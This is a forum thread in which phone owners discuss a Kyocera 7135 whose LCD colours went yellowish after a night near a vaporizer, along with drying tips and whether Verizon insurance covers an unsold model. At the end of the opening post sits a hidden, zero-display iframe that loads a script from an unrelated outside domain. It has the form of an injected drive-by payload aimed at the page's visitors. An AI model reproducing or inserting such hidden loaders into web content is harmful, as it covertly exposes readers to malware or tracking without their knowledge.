+ Reply to Thread
Page 1 of 2 1 2 LastLast

I think I damaged my LCD **got it back today and is fixed!!**

Last night, I left my phone out in my room about 15 feet from one of those Vaporizer's you use when you think someone has a cold or something....Anyways, my LCD colors are now off and look almost yellowish. I have tried to hard reset it and a couple of other things!! I am soooo bummed. I might have to take this to Verizon and have them get it repaired or I could pay my 50 dollar deductible and just get a whole new one.

This sucks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That is a bummer. I would move it to a dry room and give it time to dry out and see what happens. I would also leave it off until it does dry out.

Take your 7135 to Verizon? Where do you think they are going to get the replacement from? They don't have any....

Did you get your phone from Verizon? Will they repair a phone that they don't officially support yet? Interesting dilemma you've got. Let us know how it turns out!
    Sorry, but I no longer make 7135 headset adapters.

They should repair my phone since I am in San Diego. The Verizon store I always deal with takes good care of whatever problems I usually have. I think what will happen is they will send my phone out to Kyocera and just have it repaired. This happened to me last year with a similar problem with my 6035

Hotsync,
    I just sent you a private message.

Sorry to hear about your problem Muff! Just goes to show how we really need insurance on these phones. No matter how careful you are, the unexpected can jump up and bite you. Reminds me of the time I fell in a trout farm lake with all my clothes on and my cellphone hooked to my belt - and no insurance.

Administrator
    id be surprised if verizon would repair this phone since, as hotsync stated, they dont sell them yet...

id be surprised if verizon would repair this phone since, as hotsync stated, they dont sell them yet...
    Don't be too surpised. From the minute you make the first phone call with your new phone, it's covered under Verizon's insurance. Even though they don't carry this phone, they will send it to Kyocera to have it repaired. I did this last year when the 6035 was still out and I had a pre production model. They sent it out and I actually ended up getting a production model back.

Muffdivr27, the phone was 15 feet away from the humidifier? I wouldn't think that would have damaged your phone, maybe if you left it laying on top of the humidifier, and then it would have been a mixture of the heat and the humidity, but 15 feet away I would think the phones are that sensitive to heat and humidity. Could there been anything else? Could they phone have gotten wet or could it have gotten left in the sunlight? If this has in deed caused the problems that you describe, then I would think the folks who live in a high humidity (Southern US especially Florida) and hot area will have major problems. Also, if this was in fact caused but the humidifier, I would suggest you leaving the phone powered off for a couple of days and in a warm dry area and maybe it will dry out.

I have seen this kind of problem happen to LCDs that were overheated in the sunlight, sometimes this happens to my bicycle computer and once it cools off, its ok.

Hope this helps? Sure sorry to hear (see) your troubles...

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Worbc
    The phone has never been dropped and this just happened from last night to this morning. This morning, I noticed the colors were a little off when I was browsing with Blazer and thought maybe a soft reset would fix it. That didn't help so I tried to do a hard reset
    and this didn't do the trick either. Hopefully this will dry out but I saw this before where the LCD seemed kind of washed out. I really hope this can dry overnight.

muffdiver27, do you have a warm place to place it overnight? I would turn it off and place it somewheres warm and dry. best of luck my friend....

--terry

Hi
    When you say "warm and dry", where would you suggest?

Thanks

I'm not touching that one.

~troublz

with a name like muffdivr you cant be serious! lol
    iPhone therefore iAm.

Muff, I would leave the 7135 on top of your oven / stove, or lay it on top of your computer CPU, towards the back on top of the power supply, you don't want a lot of heat but just enought to be "warmer" than the room temp.

DOn't blame ya Troublz or Steve, but since I had started this, I needed to respond...

hope this helps Muff...

--terry

Originally posted by WORBC
    I would leave the 7135 on top of your oven / stove...
    Of course he doesn't mean a HOT oven... then you'll have even bigger problems.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by muffdivr27
    From the minute you make the first phone call with your new phone, it's covered under Verizon's insurance.
    I'd love to know who I could get this statement from Verizon in writing from. Both Verizon and Asurion have told me the phone is not insurable until Verizon sells the phone and even then it still might not be insurable. They both told me, "this might change in the future", so as soon as I get official statement from Verizon or Asurion directly that the phone is insurable I'm assuming the policy changed.

Even though they don't carry this phone, they will send it to Kyocera to have it repaired. I did this last year when the 6035 was still out and I had a pre production model. They sent it out and I actually ended up getting a production model back.
    So your pre-production model died and you got a production model back. This makes it seems that atleast when your phone broke, it was carried by Verizon. We're saying insurance won't cover it because Verizon does not carry it yet. Your store may send it back to Kyocera to get repaired, but it would see you'd be fronting the bill.

+ralph

p.s., I'm just trying to stay on top of this insurance stuff because it's the only thing holding me back from buying the phone.

Originally posted by WORBC
    but 15 feet away I would think the phones are that sensitive to heat and humidity.
    Holy cow, that is scary. If this damaged the phone, then everybody in Houston better just forget it. They wouldn't last a week here.

t

Administrator
    you dont want to put any forced air onto the phone (i.e. power supply, heater, etc..) just use room temperature. humidity is what will do the most harm and power supplies and other forced air devices will change this. just leave it out in natural room temp. and let it take care of itself naturally...